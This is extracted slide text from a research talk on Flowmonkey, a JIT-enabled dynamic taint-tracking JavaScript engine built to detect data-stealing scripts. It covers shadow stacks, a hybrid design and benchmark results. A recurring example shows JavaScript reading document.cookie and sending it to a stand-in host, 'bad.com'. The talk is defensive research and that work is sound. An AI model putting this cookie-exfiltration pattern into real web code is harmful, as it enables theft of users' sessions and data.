close

Вход

Забыли?

вход по аккаунту

код для вставкиСкачать
✗
IdentityStealing
Theft
Cookie
document.cookie
Password
Credit card #
Browsing history
Epidemic of Data Stealing JavaScript!
How to Detect Data Stealing?
Without Sacrificing Performance?
Motivation
Dynamic Taint Tracking
Flowmonkey
Future Work&Conclusion
Dynamic Taint Tracking
Tracks where a value goes at runtime
Dynamic Taint Tracking
1. Tag a value with a taint
2. Propagate taints with the value
3. Block taints from untrusted sinks
Example:Cookie Stealing
ck
= document.cookie
data
= tmp + ck;
send(“bad.com”, data);
Example:Cookie Stealing
ck
document.cookie;
= document.cookie
data
= tmp + ck;
send(“bad.com”, data );
Inject Taints
(At confidential sources)
Example:Cookie Stealing
ck
= document.cookie;
data
= tmp + ck;
send(“bad.com”, data );
Propagate Taints
(At assignments, etc)
Example:Cookie Stealing
ck
= document.cookie;
data
= tmp + ck;
“cr=”
send(“bad.com”, data
);+ color
Block Taints
(At untrusted sinks)
Dynamic Taint Tracking:Policies
✗
Password Protection
✗
General Policy
✗
Cookie Protection
cookie
password
secret info
send()
send()
expression
Dynamic Taint Tracking:JS
Cross site scripting prevention with dynamic data
tainting and static analysis, NDSS'07
10~100x slowdown
Analyzing information flow in JavaScript-based
browser extensions, ACSAC'09
An Empirical Study of Privacy-Violating Information
Flows in JavaScript Web Applications, CCS'10
Goal: Make It Fast
Motivation
Dynamic Taint Tracking
Flowmonkey
Future Work&Conclusion
Source code
Interpreter
Modification
JIT Engine
M
Based on Jaegermonkey
Taint tracking logic is augmented
Language Extensions
__taint(val, t)
val: a value to be tainted
t : a taint to be used
Language Extensions
__taintof(val)
returns the taint of val
Language Extensions
var secret = __taint(34349, 1);
tmp = secret * 68;
tmp2 = tmp + “345”;
tmp3 = parseInt(tmp2);
alert(__taintof(tmp)); // 1 is printed
Implementation: Shadow Stack
s * 6
push s //s=5
push 6
mul
6
6’s taint
30
5
Joined
s’ taint
taint
Real Stack
Shadow Stack
Implementation: Shadow Property
a.fld = secret
fld
a
…
Real Properties
fld‘s taint
…
Shadow Properties
Hybrid Approach
Full-fledged
Taint Tracking
Interpreter
Taint Detecting
JIT Engine
Hybrid Approach
Full-fledged
Taint Tracking
Interpreter
Taint Detecting
JIT Engine
If it doesn’t
touch a taint
Hybrid Approach
Taint detected!!
Full-fledged
Taint Tracking
Interpreter
Do full-fledged
taint tracking
Taint Detecting
JIT Engine
Hybrid Approach
Rapid prototyping
Fast with few taints
Slow with many taints
Performance: Baseline
Sunspider
cookie doesn’t flow to 3rd party code
Performance: Cookie Tracking
Sunspider
cookie doesn’t flow to 3rd party code
Demo
Motivation
Dynamic Taint Tracking
Flowmonkey
Future Work&Conclusion
Future Work
Missing Flows
Implicit Flows, Timing Channel, etc
Empirical Study
To prove the usability of taint tracking
Conclusions
A Fast Hybrid Taint Tracking Engine
First JIT-enabled taint tracking engine
Still Many Missing Parts
Possible to make it a protection tool?
Can we sacrifice some performance?
Resources
http://firebird.ucsd.edu/flowmonkey
Thank you!
1/--страниц
Пожаловаться на содержимое документа